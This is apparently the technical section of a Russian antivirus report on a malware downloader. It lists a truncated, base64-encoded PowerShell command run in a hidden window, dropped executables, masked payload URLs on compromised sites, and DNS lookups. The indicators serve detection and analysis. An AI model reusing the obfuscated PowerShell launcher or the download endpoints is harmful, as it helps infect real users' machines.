Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAEwAQwBVAFUAZgBoAGQAPQAnAFcASwBXAEYAUgBzAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAYABVAHIAaQB0AHkAcABgAFIAbwB0AE8AYwBvAEwAIgAgAD...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\meqh.exe
- %TEMP%\meqh.exe
- 'st####zrenner.com':80
- http://sa####market.com/wp-includes/W1V/
- http://pr#####beforebuying.com/wordpress/nx5RXviWhv/
- http://ma######ektrik.mbakluli.com/sites/Qzsxf45344/
- http://ma######ektrik.mbakluli.com/cgi-sys/suspendedpage.cgi
- DNS ASK st##data.it
- DNS ASK sa####market.com
- DNS ASK pr#####beforebuying.com
- DNS ASK ma######ektrik.mbakluli.com
- DNS ASK st####zrenner.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAEwAQwBVAFUAZgBoAGQAPQAnAFcASwBXAEYAUgBzAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAYABVAHIAaQB0AHkAcABgAFIAbwB0AE8AYwBvAEwAIgAgAD...' (со скрытым окном)